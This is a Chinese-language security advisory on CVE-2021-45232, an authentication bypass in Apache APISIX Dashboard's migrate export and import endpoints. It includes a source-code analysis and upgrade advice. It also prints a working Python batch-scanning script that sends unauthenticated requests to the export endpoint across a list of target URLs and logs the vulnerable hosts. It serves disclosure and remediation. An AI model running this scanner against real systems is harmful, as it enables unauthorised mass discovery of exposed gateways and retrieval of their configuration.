漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)

目录

Part1 漏洞描述

Part2 风险等级

Part3 漏洞影响

Part4 漏洞分析

4.1 漏洞源码

4.2 漏洞验证

4.3 POC

Part5 修复建议


Part1 漏洞描述

Apache APISIX 是一个动态、实时、高性能的 API 网关,Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。

在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架gindroplet,并在gin框架的基础上引入了droplet框架。所有的API和鉴权中间件都是基于droplet框架开发的,但是有些API直接使用了 框架gin 的接口从而绕过身份验证。漏洞编号为CVE-2021-45232.

Part2 风险等级

高风险

Part3 漏洞影响

  • Apache APISIX Dashboard < 2.10.1

Part4 漏洞分析

4.1 漏洞源码

本文以2.8版本为例

  • 下载链接:

https://github.com/apache/apisix-dashboard/tree/release/2.8

首先在apisix-dashboard-release-2.8/api/internal/filter/authentication.go中定义了用户通过URL访问以/apisix开头的接口时,使用HTTP Header中的Authorization进行权限认证。还定义了两个例外/apisix/admin/tool/version/apisix/admin/user/login不需要进行权限认证认证。

漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)_第1张图片

然后在apisix-dashboard-release-2.8/api/internal/route.go中注册了一些handler

漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)_第2张图片

在正常情况下利用droplet对URL进行鉴权处理,与authentication.go中的handle对应,比如ssl

漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)_第3张图片

apisix-dashboard-release-2.8/api/internal/handler/migrate/migrate.go中发现有两个接口/apisix/admin/migrate/export/apisix/admin/migrate/import没有经过droplet进行处理,存在认证绕过。

4.2 漏洞验证

漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)_第4张图片

4.3 POC

import requests
import sys

filename = sys.argv[1]
print(filename)
target = open(filename, 'r')
f = open('result.txt', 'w')
target_list = target.readlines()
for url in target_list:
    url = url.strip()
    payload = url + '/apisix/admin/migrate/export'
    try:
        rsp = requests.get(url=payload, verify=False, timeout=2)
    except:
        print('%s验证失败!'%url)
        continue
    else:
        rsp_s = rsp.text
        if "Counsumers" in rsp_s:
            print("%s存在漏洞!" % url)
            f.writelines(url + '存在漏洞!\n')
        else:
            print("%s不存在漏洞!" % url)
f.close()
target.close()

Part5 修复建议

官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本,并同时注意修改默认账户的账号密码;或可使用安全组等措施。


“D&X 安全实验室”

专注渗透测试技术

全球最新网络攻击技术

漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)_第5张图片

你可能感兴趣的:(渗透测试,代码审计,web安全防护,apache,dashboard,安全)